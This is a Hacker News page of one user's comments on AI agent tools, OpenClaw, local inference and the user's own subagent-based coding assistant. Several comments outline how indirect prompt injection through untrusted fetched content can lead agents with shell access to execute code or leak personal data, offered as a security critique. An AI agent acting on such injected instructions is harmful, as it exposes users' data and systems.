Hacker Newsnew | past | comments | ask | show | jobs | submit | mhher's commentslogin

OpenClaw has a faithful base of Chinese agents behind it. The Chinese web is flooded with posts about OpenClaw users becoming millionaires in order to entice more and more people to install it due to its incredibly sloppy and easily exploitable nature.

Peter and Sam are a masterclass in deception (or incompetence).


It's good to see that these universities seem to take their oath of education serious rather than bowing down to ideological agents. If you attempt to restrict or influence education you lost before it even started.


Not uniformly. Columbia bent the knee.

Nit: seriously*


Am I the only one who absolutely adores the local based translation feature? I use it regularly and its so good.


Yes, I really like it. I wish they let extensions access it directly but it seems they don't (yet, at least). I'm also a bit surprised more hasn't been done to distribute it separately as a command line tool as I think something like that would be very helpful. I have seen a couple of attempts to put a CLI wrapper around it but they are third-party and seem to not be well maintained or documented.


Some one up thread pointed out about:translations is where it seems to be hidden.

Also a fan of this feature. It's actually been around awhile but I think the Asian languages are a more recent addition.


> You are not supposed to install OpenClaw

Sentence could have ended there


I once randomly stumbled upon this in GNOME Software (alphabetical sorting). Was very happy to find such a quality title there.


I first encountered it when I was looking at the biggest packages in the official repositories, in order to stress-test my own APT distribution implementation. Gave it a try, had fun too, and now part of the E2E tests of the mirror :D


To me the whole OpenClaw situation is proof enough how desperate OpenAI must be for fresh (real, non-circular) cash.

In that light Altman saying things things like that is not really surprising. Contrary it only reinforces their desperation to me.


Most AI coding assistants are fundamentally broken. Tools like Claude Code and OpenCode eagerly load 10k+ tokens of monolithic system prompts into a single context window before you even type. This guarantees context amnesia and destroys local inference speeds.

I built late to fix this. It’s a single-binary Go/BubbleTea TUI built around a subagent orchestrator pattern. The main prompt is strictly ~100 lines. The orchestrator routes tasks to transient subagents with isolated context windows, explicitly preventing the "Debugging Decay" (https://arxiv.org/abs/2506.18403) and context pollution seen in monolithic agents.

Architectural notes:

* Linux Native: Strictly respects XDG base directories. No Windows support. No padded Electron GUI.

* Execution Load: The rapid context switching breaks the mainline llama.cpp scheduler. You must compile the specific PR linked in the README (or just point it at any standard API via localhost:8080).

* Licensing: BSL 1.1 to keep the core orchestrator logic out of VC-backed wrappers.

I also open-sourced pure-go-sgd (AGPLv3) today for those interested in bare-metal Go infrastructure: https://github.com/mlhher/pure-go-sgd


I need to check if Aurora Store still exists/works.


It's great to see the ggml team getting proper backing. Keeping inference in bare-metal C/C++ without the Python bloat is the only way local AI is going to scale efficiently. Well deserved for Georgi, Johannes, Piotr, and the rest of the team.


The current hype around agentic workflows completely glosses over the fundamental security flaw in their architecture: unconstrained execution boundaries. Tools that eagerly load context and grant monolithic LLMs unrestricted shell access are trivial to compromise via indirect prompt injection.

If an agent is curling untrusted data while holding access to sensitive data or already has sensitive data loaded into its context window, arbitrary code execution isn't a theoretical risk; it's an inevitability.

As recent research on context pollution has shown, stuffing the context window with monolithic system prompts and tool schemas actively degrades the model's baseline reasoning capabilities, making it exponentially more vulnerable to these exact exploits.


I think this is basically obvious to anyone using one of these but they're just they like the utility trade off like sure it may leak and exfiltrate everything somewhere but the utility of these tools is enough where they just deal with that risk.


While I understand the premise I think this is a highly flawed way to operate these tools. I wouldn't want to have someone with my personal data (whichever part) that might give it to anyone who just asks nicely because the context window has reached a tipoff point for the models intelligence. The major issue is a prompt attack may have taken place and you will likely never find out.


It feels to me there are plenty of people running these because "just trust the AI bro" who are one hallucination away from having their entire bank account emptied.


Exactly, I've seen people who bought a Mac Mini and ended up running claw against a claude subscription. Completely misunderstand the point of local models. Plus, there was more hype about running claw way cheaper on Raspberry Pi which cost the stock price of Raspberry maker to skyrocket.

Some of the comments here show that technical people set these things up for non-technical people, which is just one step away from a misstep. Time will show whether this is similar in behavior to the "I can run it" mindset that people had with local models before. A small dopamine hit to see "it can be done" in order to end up a cloud service in the long run.


Information Flow Control is highly idealistic unless there are global protocol changes across any sort of integration channel to deem trusted vs untrusted.


could you share that study?


https://arxiv.org/abs/2512.13914

Among many more of them with similar results. This one gives a 39% drop in performance.

https://arxiv.org/abs/2506.18403

This one gives 60-80% after multiple turns.


Consider applying for YC's Summer 2026 batch! Applications are open till May 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: